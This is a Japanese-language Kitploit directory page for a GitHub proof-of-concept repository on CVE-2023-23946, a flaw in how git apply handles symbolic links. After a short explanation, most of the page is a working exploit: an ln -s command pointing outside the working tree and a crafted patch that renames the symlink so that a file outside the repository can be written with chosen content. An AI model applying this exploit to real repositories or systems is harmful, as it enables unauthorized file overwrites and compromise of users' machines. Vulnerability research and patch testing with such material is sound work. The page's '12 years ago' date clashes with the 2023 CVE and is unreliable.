Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23946-POC — CVE-2023-23946 の解説とPOC | Kitploit
ツール/GitHubGitHub/bruno-1337/cve-2023-23946-poc
脆弱性分析エクスプロイト論文と研究学習と教育バイナリエクスプロイト
GitHubbruno-1337/cve-2023-23946-poc

CVE-2023-23946-POC

CVE-2023-23946 の解説とPOC

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23946 POC エクスプロイト

CVE-2023-23946 の説明と POC

CVE-2023-23946 の脆弱性は、git がシンボリックリンクを処理する際の欠陥に起因します。git はシンボリックリンクを作成するとき、実際にはそれをシンボリックリンクとして処理しないため、これを悪用して、作業ツリーの外部にあるファイルを指すことができます。

最初にシンボリックリンクを作成する

root@kitploit:~
ln -s [PATH_YOU_WANT_TO_ACCESS_OUTSITE_WORKING_TREE] symlink

次に、git apply で使用するパッチを作成する

root@kitploit:~
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FILE_OUTSIDE]
@@ -0,0 +1 @@
+[WHAT_YOU_WANT_INSIDE_THE_FILE]
\ No newline at end of file

このパッチは何をするのでしょうか?既存のシンボリックリンクの名前を変更し、新しいファイルを作成します。これにより、/newsymlink/[FILE_OUTSIDE] を変更するとき、git はシンボリックリンクに対する保護を適用しなくなります。

ツールをダウンロード